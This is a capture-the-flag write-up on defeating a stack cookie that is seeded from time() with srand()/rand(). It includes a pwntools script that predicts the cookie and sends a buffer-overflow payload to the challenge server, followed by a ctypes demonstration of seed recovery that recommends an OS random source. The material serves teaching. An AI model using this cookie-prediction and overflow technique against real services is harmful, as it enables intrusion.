I thought this challenge would be easy, but once I started I realised I was missing a knowledge point: rand() produces its values with a fixed algorithm computed from the seed handed to srand(), and this challenge seeds with the current time. So if we connect to the server and take the seed from the same moment, our seed matches the server's and the rand() values follow directly. The challenge is not hard; it hinges on that one point. After reading a write-up I wrote my own code, pasted below.
#!/usr/bin/env python
# coding=utf-8
from pwn import *
import time

while True:
    io = remote('problem1.tjctf.org', 8000)
    # Seed with the current second, the same value the server's srand() uses
    seed = int(time.time())
    # Local helper binary ./rand prints the rand() values for that seed, one per line
    myio = process(argv=['rand', str(seed)], executable='./rand')
    s = myio.recv()
    srand = s.split('\n')[:-1]   # drop the empty element after the trailing newline
    cookie = ''.join([p32(int(x)) for x in srand])
    print repr(cookie)
    # p32(0x0) replace j, A*64 replace gets-array
    # address=hex(0xFFFFFFFF+1-0xdeadbeef+0xA)
    payload = "A" * 64 + cookie + p32(0x0) + p32(0x2152411b)
    log.info('Payload : ' + repr(payload))
    io.sendlineafter("What is your name?\n", payload)
    log.success(io.recv())
    c = raw_input("Please input anykey")
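The knowledge point above, as an added example that is not part of the original write-up: it calls the C library's own srand()/rand() through ctypes, shows that a clock-seeded stream is reproduced exactly by anyone who knows roughly when it was seeded (the candidate set is just a few seconds wide), and contrasts it with an OS-backed random source, which is what a cookie like this should be drawn from. It assumes a Linux/glibc or macOS host whose C library ctypes can load; the function names rand_stream, candidate_seeds and unpredictable_token are mine, not the challenge's.

```python
#!/usr/bin/env python3
# Added example, not part of the original write-up. Calls libc srand()/rand()
# via ctypes to show why a time-seeded stream is reproducible, and what an
# unpredictable source looks like by comparison.
import ctypes
import ctypes.util
import secrets
import time


def _load_libc():
    # find_library() may return None in minimal containers; fall back to the
    # usual glibc soname (assumption: a Linux/glibc or macOS host).
    name = ctypes.util.find_library("c") or "libc.so.6"
    libc = ctypes.CDLL(name)
    libc.srand.argtypes = [ctypes.c_uint]
    libc.srand.restype = None
    libc.rand.argtypes = []
    libc.rand.restype = ctypes.c_int
    return libc


_libc = _load_libc()


def rand_stream(seed, count):
    """First `count` rand() values after srand(seed): fully determined by the seed."""
    _libc.srand(seed)
    return [_libc.rand() for _ in range(count)]


def candidate_seeds(observed, approx_time, window):
    """Seeds in [approx_time - window, approx_time + window] whose rand() stream
    starts with `observed`. For a time-seeded program this is the whole space an
    outsider has to consider: 2*window+1 values, i.e. a few bits of 'secret'."""
    n = len(observed)
    return [s for s in range(approx_time - window, approx_time + window + 1)
            if rand_stream(s, n) == observed]


def unpredictable_token(nbytes=4):
    """What the challenge binary should do instead: draw the cookie from the OS
    CSPRNG (getrandom/urandom) rather than from a time()-derived seed."""
    return secrets.token_bytes(nbytes)


if __name__ == "__main__":
    # Model the challenge: the "server" seeds with the current second.
    server_seed = int(time.time())
    server_cookie_words = rand_stream(server_seed, 4)
    # A client that only knows it connected within a few seconds finds the seed.
    guess = int(time.time())
    found = candidate_seeds(server_cookie_words, guess, window=5)
    print("server seed:", server_seed, "matching candidates:", found)
    print("OS-random token (not derivable from the clock):", unpredictable_token().hex())
```

Running it prints the server's seed inside the candidate list every time, which is the whole lesson: the cookie's entropy is the uncertainty about the clock, not the size of the value. The mitigation is to stop deriving the secret from time() and read it from the kernel's random source, as unpredictable_token() does.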